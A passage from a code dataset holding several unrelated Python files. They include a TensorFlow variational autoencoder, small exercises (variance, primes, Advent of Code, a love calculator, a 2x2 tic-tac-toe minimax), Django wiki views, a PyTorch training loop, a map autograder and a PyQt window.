tensorflow.distributions import Bernoulli\n\nclass SteeredVAE:\n \n def __init__(self, n_input, n_list, n_y=None,y_weight=100):\n '''\n n_input - number of input neurons\n n_list - list of numbers of neurons in the hidden layers\n n_y: optional - number of features that will be given as input y during training\n y_weight - relative weight of losses (VAE vs regression for y features). Trial-and-error\n '''\n # input data\n self.X = tf.placeholder(tf.float32, shape=(None, n_input))\n # input y features\n if (n_y is not None):\n self.y = tf.placeholder(tf.float32, shape=(None, n_y))\n \n # encoder\n self.encoder_layers = []\n # input layer\n previous = n_input\n # current is the output of each layer (skip last because there is nothing after it)\n for current in n_list[:-1]:\n h = DenseLayer(previous,current)\n self.encoder_layers.append(h)\n previous = current\n # latent features number\n latent = n_list[-1]\n encoder_output = DenseLayer(current,latent*2,activation='none')\n self.encoder_layers.append(encoder_output)\n \n # feed forward through encoder\n c_X = self.X\n for layer in self.encoder_layers:\n c_X = layer.feed_forward(c_X)\n # c_X now holds the output of the encoder\n # first half are the means\n self.means = c_X[:,:latent]\n # second half are the std; must be positive; +1e-6 for smoothing\n self.std = tf.nn.softplus(c_X[:,latent:]) + 1e-6\n \n # optional loss for steered latent features\n if (n_y is not None):\n self.yhat = self.means[:,:n_y]\n self.error = tf.losses.mean_squared_error(labels=self.y,predictions=self.yhat)\n \n # reparameterization trick\n normal = Normal(loc=self.means,scale=self.std)\n self.Z = normal.sample()\n\n # decoder\n self.decoder_layers = []\n previous = latent\n for current in reversed(n_list[:-1]):\n h = DenseLayer(previous,current)\n self.decoder_layers.append(h)\n previous = current\n # output is the reconstruction\n decoder_output = DenseLayer(previous,n_input,activation=lambda x:x)\n self.decoder_layers.append(decoder_output)\n\n #feed forward through decoder, using the sampled 'data'\n c_X = self.Z\n for layer in self.decoder_layers:\n c_X = layer.feed_forward(c_X)\n logits = c_X\n # use logits for cost function below\n neg_cross_entropy = -tf.nn.sigmoid_cross_entropy_with_logits(labels=self.X,\n logits=logits)\n neg_cross_entropy = tf.reduce_sum(neg_cross_entropy, 1)\n \n # output\n self.y_prob = Bernoulli(logits=logits)\n \n # sample from output\n self.post_pred = self.y_prob.sample()\n self.post_pred_probs = tf.nn.sigmoid(logits)\n \n # generate 'de-novo' output\n self.gen = tf.Variable(0)\n Z_std = Normal(0.0,1.0).sample([self.gen,latent])\n c_X = Z_std\n for layer in self.decoder_layers:\n c_X = layer.feed_forward(c_X)\n logits = c_X\n \n prior_pred_dist = Bernoulli(logits=logits)\n self.prior_pred = prior_pred_dist.sample()\n self.prior_pred_probs = tf.nn.sigmoid(logits)\n \n # manually input Z\n self.Z_input = tf.placeholder(np.float32, shape=(None, latent))\n c_X = self.Z_input\n for layer in self.decoder_layers:\n c_X = layer.feed_forward(c_X)\n logits = c_X\n self.manual_prior_prob = tf.nn.sigmoid(logits)\n \n # cost function\n # Kullback–Leibler divergence\n kl = -tf.log(self.std) + 0.5*(self.std**2 + self.means**2) - 0.5\n kl = tf.reduce_sum(kl, axis=1)\n # ELBO\n self.elbo = tf.reduce_sum(neg_cross_entropy - kl)\n \n if (n_y is None):\n # only ELBO\n self.optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001).minimize(-self.elbo)\n else:\n # weighted regression loss and ELBO\n self.optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001).minimize(\n tf.reduce_sum(y_weight*self.error-self.elbo))\n\n self.init = tf.global_variables_initializer()\n self.session = tf.Session()\n self.session.run(self.init)\n \n def steer(self,X,y,epochs=10,batch=50):\n '''Replaces fit, user provides the y features for the latent steering'''\n n_batches = len(X) // batch\n for epoch in range(epochs):\n print('Epoch:',epoch+1)\n cost = 0\n e_cost = 0\n for b in range(n_batches):\n c_batch = X[b*batch:(b+1)*batch]\n y_batch = y[b*batch:(b+1)*batch]\n _,c,e, = self.session.run((self.optimizer, self.elbo,self.error),feed_dict={self.X: c_batch,self.y:y_batch})\n # accumulate cost\n cost+=c\n e_cost+=e\n print('Cost:', cost,e_cost)\n \n def fit(self,X,epochs=10,batch=50):\n n_batches = len(X) // batch\n for epoch in range(epochs):\n print('Epoch:',epoch+1)\n cost = 0\n for b in range(n_batches):\n c_batch = X[b*batch:(b+1)*batch]\n _,c, = self.session.run((self.optimizer, self.elbo),feed_dict={self.X: c_batch})\n # accumulate cost\n cost+=c\n print('Cost:', cost)\n \n def predict(self,X,out='prob'):\n '''\n Pass data through encoder and decoder and retrieve reconstructed output\n by default the probabilities are returned, user can specify 'sample' or 'both'\n '''\n # correct shape if needed\n if (X.ndim==1):\n X = X.reshape([1,-1])\n pred,prob,mm = self.session.run((self.post_pred,self.post_pred_probs,self.means),feed_dict={self.X:X})\n if (out=='prob'):\n return prob,mm\n elif (out=='sample'):\n return pred\n else:\n return pred,prob\n\n def generate(self,n=1,out='prob'):\n '''\n Generate output\n by default the probabilities are returned, user can specify 'sample' or 'both'\n User specifies the number of points requested \n '''\n pred,prob = self.session.run((self.prior_pred,self.prior_pred_probs),feed_dict={self.gen:n})\n if (out=='prob'):\n return prob\n elif (out=='sample'):\n return pred\n else:\n return pred,prob\n \n def feed(self,Z):\n '''Generate output using provided latent-space input Z'''\n # correct shape if needed\n if (Z.ndim==1):\n Z = Z.reshape([1,-1])\n return self.session.run(self.manual_prior_prob,feed_dict={self.Z_input:Z})\n \n def close(self):\n self.session.close()\n\nclass DenseLayer(object):\n '''A fully connected layer'''\n \n def __init__(self, n_in, n_out, activation=tf.nn.relu):\n '''number of input and output neurons; the activation function'''\n self.weights = tf.Variable(tf.random_normal(shape=(n_in, n_out), stddev=2/np.sqrt(n_in)))\n self.bias = tf.Variable(tf.constant(0.0,shape=[n_out]))\n if (activation=='none'):\n self.activation = lambda x: x\n else:\n self.activation = activation\n \n def feed_forward(self, X):\n '''Run input through layer and retrieve output'''\n return self.activation(tf.matmul(X, self.weights) + self.bias)\n\nif (__name__ == '__main__'):\n print('This module is not intended to run by iself')\n","repo_name":"ralhadeff/machine-learning-tools","sub_path":"VariationalAE/steered.py","file_name":"steered.py","file_ext":"py","file_size_in_byte":8002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70687781880","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# variance.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: jdussert <marvin@42.fr> +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/01/20 15:58:54 by jdussert #+# #+# #\n# Updated: 2020/01/20 16:44:08 by jdussert ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport numpy as np\n \ndef variance(x):\n\t\"\"\"Computes the variance of a non-empty numpy.ndarray, using a for-loop.\n Args:\n x: has to be an numpy.ndarray, a vector.\n Returns:\n The variance as a float.\n None if x is an empty numpy.ndarray.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n\tm = float(len(x))\n\tif m == 0:\n\t\treturn None\n\tmean_x = 0\n\tvariance_x = 0\n\tfor nb in x:\n\t mean_x += float(nb)\n\tmean_x /= m\n\tfor nb in x:\n\t variance_x += float((nb - mean_x)**2)\n\tvariance_x /= m\n\treturn variance_x\n\n# Examples :\nX = np.array([0, 15, -9, 7, 12, 3, -21])\nprint(\"La variance est de :\\n\", variance(X))\nprint(np.var(X))\n","repo_name":"JehanneDussert/bootcampPython","sub_path":"bootcamp_machineLearning/Day00/ex02/variance.py","file_name":"variance.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19027640537","text":"limit = 104801\nimport sys\nimport math\nprime = []\nprime.append(1)\nprime.append(2)\ndef isprime(num):\n check = 1\n for i in range(1, len(prime)):\n if num % prime[i] == 0:\n check = 0\n break\n elif prime[i] > num //2:\n break\n if check == 1:\n prime.append(num)\n\nfor i in range (3,limit):\n isprime(i)\n \nt = int(input().strip())\nfor a0 in range(t):\n n = int(input().strip())\n print(prime[n])\n","repo_name":"AnimeshKumar2710/project-Euler","sub_path":"euler007.py","file_name":"euler007.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36153490634","text":"from django.forms import widgets\nfrom django.http.response import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django import forms\nfrom markdown2 import Markdown\nimport random\n\nfrom . import util\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\ndef search(request):\n if request.method == \"POST\":\n title = str(request.POST[\"q\"])\n titles = util.list_entries();\n if(title in titles):\n return HttpResponseRedirect(reverse(\"title\", args=(title,)))\n #return views.getTitle(request,title) #puede funcionar pero estariamos en el link /search, pero no es buena practica\n else:\n substring=[]\n for name in titles:\n if title in name:\n substring+=[name]\n #mas rapido: [name for name in titles if title in name ]\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": substring\n })\n\nclass Page(forms.Form):\n title = forms.CharField(label=\"Title:\")\n content = forms.CharField(widget=forms.Textarea)\n\ndef newPage(request):\n if request.method == \"POST\":\n page = Page(request.POST)\n if page.is_valid():\n title = page.cleaned_data[\"title\"]\n if util.get_entry(title):\n return render(request, \"encyclopedia/error.html\", {\n \"title\": \"Error\",\n \"content\": \"The page already exists\"\n })\n else:\n content = page.cleaned_data[\"content\"]\n util.save_entry(title, content)\n return HttpResponseRedirect(reverse(\"title\", args=(title,)))\n \n else:\n return render(request, \"encyclopedia/add.html\", {\n 'page': page\n })\n \n return render(request,\"encyclopedia/add.html\",{\n 'page': Page()\n })\n \nclass EditPageForm(forms.Form):\n content = forms.CharField(widget=forms.Textarea)\n\ndef edit(request, title):\n if request.method == \"POST\":\n page = EditPageForm(request.POST)\n if page.is_valid():\n content = page.cleaned_data[\"content\"]\n util.save_entry(title, content)\n return HttpResponseRedirect(reverse(\"title\", args=[title]))\n else:\n #messages.error(request, f'Editing form not valid, please try again!')\n return render(request, \"encyclopedia/edit.html\",{\n 'page': page,\n 'title': title\n })\n # si se accede del entry page\n elif request.method == \"GET\":\n # si no existe la pag\n content = util.get_entry(title)\n if ( content == None):\n return render(request, \"encyclopedia/error.html\", {\n \"title\": \"Error 404\",\n \"content\": \"page not found\"\n })\n\n return render(request, \"encyclopedia/edit.html\",{\n 'page': EditPageForm(initial={'content': content}),\n 'title': title\n })\n\ndef getTitle(request, title):\n content = util.get_entry(title)\n if(content):\n content_HTML = Markdown().convert(content)#convierte md en html\n return render(request, \"encyclopedia/title.html\", {\n \"title\": title,\n # luego en entry.html para que dentro del corchete compile html \n # y no nos muestre raw html se pone {{content|safe}}\n \"content\": content_HTML\n })\n else: \n return render(request, \"encyclopedia/error.html\", {\n \"title\": \"Error 404\",\n \"content\": \"page not found\"\n })\n\ndef randomPage(request):\n title = random.choice(util.list_entries())\n return HttpResponseRedirect(reverse('title',args=(title,))) \n","repo_name":"BiplopDey/wiki","sub_path":"encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1013210944","text":"\"\"\"Train classifier for source dataset.\"\"\"\n\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom utils.utils import save_model\nfrom core.test import eval\n\n\ndef train_src(model, src_data_loader, tgt_data_loader_eval, device, params):\n \"\"\"Train classifier for source domain.\"\"\"\n ####################\n # 1. setup network #\n ####################\n\n # setup criterion and optimizer\n\n parameter_list = [\n {\n \"params\": get_parameters(model.features, 'weight'),\n \"lr\": 0.001\n },\n {\n \"params\": get_parameters(model.features, 'bias'),\n \"lr\": 0.002\n },\n {\n \"params\": get_parameters(model.fc, 'weight'),\n \"lr\": 0.01\n },\n {\n \"params\": get_parameters(model.fc, 'bias'),\n \"lr\": 0.02\n },\n ]\n optimizer = optim.SGD(parameter_list, momentum=0.9)\n criterion = nn.CrossEntropyLoss()\n\n ####################\n # 2. train network #\n ####################\n global_step = 0\n for epoch in range(params.num_epochs):\n for step, (images, labels) in enumerate(src_data_loader):\n model.train()\n global_step += 1\n adjust_learning_rate(optimizer, global_step)\n\n # make images and labels variable\n images = images.to(device)\n labels = labels.to(device)\n\n # zero gradients for optimizer\n optimizer.zero_grad()\n\n # compute loss for critic\n preds = model(images)\n loss = criterion(preds, labels)\n\n # optimize source classifier\n loss.backward()\n optimizer.step()\n\n # print step info\n if (global_step % params.log_step == 0):\n print(\"Epoch [{:4d}] Step [{:4d}]: loss={:.5f}\".format(\n epoch + 1, global_step, loss.data.item()))\n\n # eval model on test set\n if (global_step % params.eval_step == 0):\n eval(model, src_data_loader, device)\n eval(model, tgt_data_loader_eval, device)\n\n # save model parameters\n if (global_step % params.save_step == 0):\n save_model(\n model, params.src_dataset +\n \"-source-classifier-{}.pt\".format(global_step), params)\n\n # end\n if (global_step > params.max_step):\n break\n\n # save final model\n save_model(model, params.src_dataset + \"-source-classifier-final.pt\",\n params)\n\n return model\n\n\ndef adjust_learning_rate(optimizer, global_step):\n lr_0 = 0.01\n gamma = 0.001\n power = 0.75\n lr = lr_0 / (1 + gamma * global_step)**power\n #print('lr in step {} is {}'.format(global_step, lr))\n optimizer.param_groups[0]['lr'] = lr * 0.1\n optimizer.param_groups[1]['lr'] = lr * 0.2\n optimizer.param_groups[2]['lr'] = lr * 1\n optimizer.param_groups[3]['lr'] = lr * 2\n\n\ndef get_parameters(module, flag):\n \"\"\" flag = 'weight' or 'bias'\n \"\"\"\n for name, param in module.named_parameters():\n if flag in name:\n yield param","repo_name":"wogong/pytorch-office_finetune","sub_path":"core/pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"29030198558","text":"import unittest\nimport map\nimport readMap\nimport os\n\n\nclass p1(unittest.TestCase):\n def test(self):\n free1 = map.Free(0, 0)\n free3 = map.Free(0, 0)\n free3.setObstruction(3)\n free9 = map.Free(0, 0)\n free9.setObstruction(9)\n entry = map.Entry(0, 0)\n wall1 = map.Wall(0, 0)\n wall2 = map.Wall(0, 0)\n\n cells = [wall1, free1, free3, free9, entry, wall2]\n pairs = []\n for (i, cell) in enumerate(cells):\n potential_pairs = cells[i + 1 :]\n for pair in potential_pairs:\n pairs.append((cell, pair))\n\n student_answers = []\n for pair in pairs:\n student_answers.append(map.obstructionAddition(pair[0], pair[1]))\n reference_answers = [-1, -1, -1, -1, -1, 4, 10, -1, -1, 12, -1, -1, -1, -1, -1]\n\n for i in range(len(student_answers)):\n if student_answers[i] != reference_answers[i]:\n raise Exception(\n \"\\nCell 1: {} \\nCell 2: {} \\nExpected: {} Got: {}\".format(\n pairs[i][0],\n pairs[i][1],\n reference_answers[i],\n student_answers[i],\n )\n )\n\n\nclass p2(unittest.TestCase):\n def test(self):\n test_map = readMap.read(os.path.join(\"maps\", \"medium.map\"))\n entry = map.Entry(16, 6)\n wall = map.Wall(2, 10)\n free = map.Free(5, 5)\n reference_answers = [entry, wall, free]\n student_answers = [\n test_map.getCell(16, 6),\n test_map.getCell(2, 10),\n test_map.getCell(5, 5),\n ]\n student_answers_L = [\n test_map.getCellL(map.Locn(16, 6)),\n test_map.getCellL(map.Locn(2, 10)),\n test_map.getCellL(map.Locn(5, 5)),\n ]\n\n for (i, student_answer) in enumerate(student_answers):\n if student_answer != reference_answers[i]:\n raise Exception(\n \"\\ngetCell Expected: {} Got: {}\".format(\n reference_answers[i], student_answer\n )\n )\n\n for (i, student_answer) in enumerate(student_answers_L):\n if student_answer != reference_answers[i]:\n raise Exception(\n \"\\ngetCellL Expected: {} Got: {}\".format(\n reference_answers[i], student_answer\n )\n )\n\n\nclass p3(unittest.TestCase):\n def test(self):\n simple = readMap.read(os.path.join(\"maps\", \"simple.map\"))\n simple_v2 = readMap.read(os.path.join(\"maps\", \"simple_v2.map\"))\n medium = readMap.read(os.path.join(\"maps\", \"medium.map\"))\n medium_v2 = readMap.read(os.path.join(\"maps\", \"medium_v2.map\"))\n medium_v4 = readMap.read(os.path.join(\"maps\", \"medium_v4.map\"))\n\n maps = [simple, simple_v2, medium, medium_v2, medium_v4]\n map_names = [\"simple\", \"simple_v2\", \"medium\", \"medium_v2\", \"medium_v4\"]\n reference_answers = [(1, 2), (2, 9), (2, 5), (13, 31), (17, 59)]\n\n for (i, m) in enumerate(maps):\n student_answer = map.victimSum(m)\n if student_answer != reference_answers[i]:\n raise Exception(\n \"\\n{} map Expected: {} Got: {}\".format(\n map_names[i], reference_answers[i], student_answer\n )\n )\n\n\nclass p4(unittest.TestCase):\n def test(self):\n medium_v4 = readMap.read(os.path.join(\"maps\", \"medium_v4.map\"))\n agent = map.Agent(medium_v4)\n if agent.allVisited():\n raise Exception(\n \"\\nagent.all_visited() returned True but not all victims have been visited yet\"\n )\n agent.move(map.Locn(4, 18))\n agent.move(map.Locn(2, 5))\n agent.move(map.Locn(2, 11))\n agent.move(map.Locn(11, 20))\n agent.move(map.Locn(2, 17))\n agent.move(map.Locn(11, 26))\n agent.move(map.Locn(2, 5))\n\n if not agent.allVisited():\n raise Exception(\n \"\\nagent.all_visited() returned False but all victims have been visited\"\n )\n\n reference_path = [\n map.Locn(16, 6),\n map.Locn(4, 18),\n map.Locn(2, 5),\n map.Locn(2, 11),\n map.Locn(11, 20),\n map.Locn(2, 17),\n map.Locn(11, 26),\n map.Locn(2, 5),\n ]\n if reference_path != agent.path:\n raise Exception(\n \"\\nWrong path\\nExpected: {}\\nGot: {}\".format(reference_path, agent.path)\n )\n","repo_name":"joseppujadas/cmu-07180","sub_path":"07180_Programming_1/autograder.py","file_name":"autograder.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7802816759","text":"import argparse\n\nDIRECTION_FORWARD = 'forward'\nDIRECTION_UP = 'up'\nDIRECTION_DOWN = 'down'\n\n\"\"\"\nAll information and context was taken from https://adventofcode.com/2021/day/1\n\"\"\"\n\n\ndef calculate_x_final_position(directions: list[tuple]) -> int:\n x_position = 0\n for direction, value in directions:\n if direction == DIRECTION_FORWARD:\n x_position += int(value)\n\n print(f\"The horizontal final position is {x_position}\")\n return x_position\n\n\ndef calculate_y_final_position(directions: list[tuple]) -> int:\n y_position = 0\n for direction, value in directions:\n if direction == DIRECTION_UP:\n y_position -= int(value)\n elif direction == DIRECTION_DOWN:\n y_position += int(value)\n\n print(f\"The depth final position is {y_position}\")\n return y_position\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\")\nargs = parser.parse_args()\n\ndirections = None\nwith open(args.input) as file:\n directions = file.read().splitlines()\n directions = [direction.split() for direction in directions]\n\nif directions:\n x_position = calculate_x_final_position(directions)\n y_position = calculate_y_final_position(directions)\n result = x_position * y_position\n print(f\"The product from x and y is {result}\")\n","repo_name":"mathiashls/adventofcode-2021","sub_path":"day2/day2_a.py","file_name":"day2_a.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30979862049","text":"from setuptools import setup, find_packages\nfrom pathlib import Path\nimport glob\n\ninteractive_files = []\n\nfor f in glob.glob('src/interactive_interface/dist/**', recursive=True):\n if not Path(f).is_dir():\n interactive_files.append('..' + f[3:])\n\nfor f in glob.glob('src/interactive_interface/lean_server/**', recursive=True):\n if not Path(f).is_dir():\n interactive_files.append('..' + f[3:])\n\n\n\nsetup(\n name='Lean game maker',\n version='0.0.1',\n author='Mohammad Pedramfar',\n author_email='m.pedramfar15@imperial.ac.uk',\n description='A Lean game maker',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n package_data={\n '': ['*.css', '*.css.map', '*.js', 'templates/*'] + interactive_files,\n },\n scripts=['bin/make-lean-game'],\n install_requires=['regex >= 2018.7.11', 'jinja2 >= 2.10', 'mistletoe >= 0.7.1', 'toml >= 0.10.0', 'fire >= 0.1.3', 'jsonpickle >= 1.2', 'polib >= 1.1.0'])\n\n","repo_name":"mpedramfar/Lean-game-maker","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"40"} +{"seq_id":"43840848975","text":"from PyQt5.QtCore import Qt,QTime,QTimer\r\nfrom PyQt5.QtWidgets import *\r\nfrom SecondWin import *\r\nfrom FinalWindow import *\r\n \r\napp = QApplication([])\r\n \r\nclass MainWin(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.look()\r\n self.initUI()\r\n self.connect()\r\n \r\n def look(self):\r\n self.setWindowTitle('1st screen')\r\n self.resize(600,400)\r\n \r\n def initUI(self):\r\n self.main_layout = QVBoxLayout()\r\n self.hello_text = QLabel('Hello\\nhello\\nhello')\r\n self.instruction_text = QLabel('Long text')\r\n self.button = QPushButton('Start')\r\n self.main_layout.addWidget(self.hello_text)\r\n self.main_layout.addWidget(self.instruction_text)\r\n self.main_layout.addWidget(self.button, alignment=Qt.AlignCenter)\r\n self.setLayout(self.main_layout)\r\n \r\n def connect(self):\r\n \r\n self.button.clicked.connect(self.next_screen)\r\n \r\n def next_screen(self):\r\n self.hide()\r\n self.second_screen = SecondWin()\r\n self.second_screen.show()\r\n \r\nmain_win = MainWin()\r\nmain_win.show()\r\napp.exec_()","repo_name":"Fiksheid/Rufie","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28575330232","text":"# 🚨 Don't change the code below 👇\nprint(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\").lower()\nname2 = input(\"What is their name? \\n\").lower()\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\n\ntotal_word1 = 0 # Creating this variable for storing total \"TRUE\" word characters\ntotal_word2 = 0 # Creating this variable for storing total \"LOVE\" word characters\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'T' Character in both words and suming the count.\n\nif 't' in name1 or 't' in name2:\n word1 = name1.count('t')\n word2 = name2.count('t')\n total_word1 = word1 + word2\n# print(f\"'T' word count is {word1 + word2}\")\n#else:\n# print(\"'T' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'R' Character in both words and suming the count.\n\nif 'r' in name1 or 'r' in name2:\n word1 = name1.count('r')\n word2 = name2.count('r')\n total_word1 += word1 + word2\n# print(f\"'R' word count is {word1 + word2}\")\n#else:\n# print(\"'R' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'U' Character in both words and suming the count.\n\nif 'u' in name1 or 'u' in name2:\n word1 = name1.count('u')\n word2 = name2.count('u')\n total_word1 += word1 + word2\n# print(f\"'U' word count is {word1 + word2}\")\n#else:\n# print(\"'U' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'E' Character in both words and suming the count.\n\nif 'e' in name1 or 'e' in name2:\n word1 = name1.count('e')\n word2 = name2.count('e')\n total_word1 += word1 + word2\n# print(f\"'E' word count is {word1 + word2}\")\n#else:\n# print(\"'E' word count is 0\")\n\n#print(f\"Total characts of word 'TRUE' is {total_word1}\") #Printing total \"TRUE\" word characters\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'L' Character in both words and suming the count.\n\nif 'l' in name1 or 'l' in name2:\n word3 = name1.count('l')\n word4 = name2.count('l')\n total_word2 += word3 + word4\n# print(f\"'L' word count is {word3 + word4}\")\n#else:\n# print(\"'L' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'U' Character in both words and suming the count.\n\nif 'o' in name1 or 'o' in name2:\n word3 = name1.count('o')\n word4 = name2.count('o')\n total_word2 += word3 + word4\n# print(f\"'O' word count is {word3 + word4}\")\n#else:\n# print(\"'O' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'E' Character in both words and suming the count.\n\nif 'v' in name1 or 'v' in name2:\n word3 = name1.count('v')\n word4 = name2.count('v')\n total_word2 += word3 + word4\n# print(f\"'V' word count is {word3 + word4}\")\n#else:\n# print(\"'V' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'E' Character in both words and suming the count.\n\nif 'e' in name1 or 'e' in name2:\n word3 = name1.count('e')\n word4 = name2.count('e')\n total_word2 += word3 + word4\n# print(f\"'U' word count is {word3 + word4}\")\n#else:\n# print(\"'E' word count is 0\")\n\n#print(f\"Total characts of word 'LOVE' is {total_word2}\")\n\n#concatinating total characters of both words to find the score\nstr_love_score = str(total_word1) + str(total_word2)\n\n#Converting the score from string to integer for next if condition\nlove_score = int(str_love_score)\n#print(love_score)\n\n#--------------------------------------------------------------------------------\n# If condition to check what's the score for printing the appropriate message\n\nif love_score < 10 or love_score > 90:\n print(f\"Your score is {love_score}, you go together like coke and mentos.\")\nelif love_score > 40 and love_score < 50:\n print(f\"Your score is {love_score}, you are alright together.\")\nelse:\n print(f\"Your score is {love_score}.\")","repo_name":"arshah92/Love-Calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42114673140","text":"class Character():\r\n def __init__(self,name,health,mana):\r\n self.name = name\r\n self.health = health\r\n self.mana = mana\r\n\r\n def description_character(self):\r\n description = self.name + ' has ' + str(self.health) + ' hp ' + str(self.mana) + ' mana'\r\n print(description)\r\n\r\n\r\nclass warrior (Character):\r\n def __init__(self,name,health,mana):\r\n super().__init__(name,health,mana)\r\n self.charge = 100\r\n self.rage = 100\r\n\r\n def get_rage(self):\r\n print('rage is ' + str(self.rage))\r\n def get_charge(self):\r\n print('charge is ' + str(self.charge))\r\n\r\nclass mage (Character):\r\n def __init__(self,name,health,mana):\r\n super().__init__(name,health,mana)\r\n self.fireball = 100\r\n self.ice_spike = 100\r\n\r\n def get_fireball(self):\r\n if self.fireball == 100:\r\n print('fireball is ready')\r\n else:\r\n print('not ready yet')\r\n def get_ice_spike(self):\r\n if self.ice_spike == 100:\r\n print('ice spike is ready')\r\n else:\r\n print('not ready yet')\r\n\r\n\r\nclass archer(Character):\r\n def __init__(self,name,health,mana):\r\n super().__init__(name,health,mana)\r\n self.trippleshot = 100\r\n self.penetration = 100\r\n\r\n def get_trippleshot(self):\r\n if self.trippleshot == 100:\r\n print('trippleshot is ready')\r\n else:\r\n print('not ready yet')\r\n def get_penetration(self):\r\n if self.penetration == 100:\r\n print('penetration is ready')\r\n else:\r\n print('not ready yet')\r\n\r\nwarrior = warrior('Warrior',320,80)\r\nmage = mage('Mage',160,350)\r\narcher = archer('Archer',210,150)\r\n\r\n\r\nwarrior.description_character()\r\nwarrior.get_charge()\r\nwarrior.get_rage()\r\nprint('\\n')\r\n\r\n\r\n\r\nmage.description_character()\r\nmage.get_fireball()\r\nmage.get_ice_spike()\r\nprint('\\n')\r\n\r\n\r\narcher.description_character()\r\narcher.get_trippleshot()\r\narcher.get_penetration()\r\nprint('\\n')\r\n\r\n\r\n","repo_name":"nectarhin/Python-projects","sub_path":"characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69829145400","text":"\nBOARD = [\" \"] * 4\nstates = [\"X\", \"O\"]\nstate_index = 0\n\ndef help_info():\n global BOARD\n BOARD = [\"1\", \"2\", \"3\", \"4\"]\n\n print(\"These are the board positions!\")\n display_board()\n BOARD = [\" \"] * 4\n\ndef play(position, board=None, index=None):\n global BOARD, state_index\n if board is None:\n board = BOARD\n\n if index is None:\n index = state_index\n\n board[position] = states[index]\n return board\n\ndef evaluate_board(board, current_state):\n if check_win(board):\n if current_state == \"O\":\n return 1\n\n else:\n return -1\n\n if check_full(board):\n return 0\n \n\ndef generator(board, available_positions, local_state_index):\n global states\n\n if check_win(board) or check_full(board):\n # display_board(board)\n return evaluate_board(board, states[(local_state_index + 1) % 2]), None\n\n board_evaluations = []\n positions = []\n\n for position in available_positions:\n new_available_positions = available_positions.copy()\n new_available_positions.remove(position)\n\n new_board = play(position, board.copy(), local_state_index)\n new_iteration = generator(new_board, new_available_positions, (local_state_index + 1) % 2)\n board_evaluations.append(new_iteration[0])\n\n print(board_evaluations, available_positions)\n fun = max if states[local_state_index] == \"O\" else min\n return fun(board_evaluations), available_positions[board_evaluations.index(fun(board_evaluations))]\n\ndef check_win(board=None):\n if board is None:\n board = BOARD\n if board[0] == board[3] and board[0] != \" \":\n return True\n\n elif board[1] == board[2] and board[1] != \" \":\n return True\n\n else:\n return False\n\ndef check_full(board=None):\n if board is None:\n board = BOARD\n return board.count(\" \") == 0\n\ndef display_board(board=None):\n if board is None:\n board = BOARD\n\n print()\n print(f\" {board[0]} | {board[1]} \")\n print(\"--------\")\n print(f\" {board[2]} | {board[3]} \")\n\ndef run_game():\n global BOARD, states, state_index\n\n while True:\n if states[state_index] == \"O\":\n max_value, position = generator(BOARD, [i for i, v in enumerate(BOARD) if v == \" \"], state_index)\n\n else:\n position = input(\"Type your position [1-4]: \")\n try:\n position = int(position) - 1\n\n if position > 3 or position < 0:\n print(\"bad position!\")\n raise\n\n except Exception as e:\n print(e)\n continue\n \n if BOARD[position] != \" \":\n print(\"Position already occupuied!\")\n continue\n\n play(position)\n\n state_index = (state_index + 1) % 2\n \n display_board()\n\n win_status = check_win()\n\n if win_status:\n print(f\"{states[(state_index + 1)%2]} won the game\")\n break\n \n if check_full():\n print(\"No winner! it was a Tie!\")\n break\n\n else:\n print(\"No winner! it was a Tie!\")\n\n\n\ndef main():\n help_info()\n 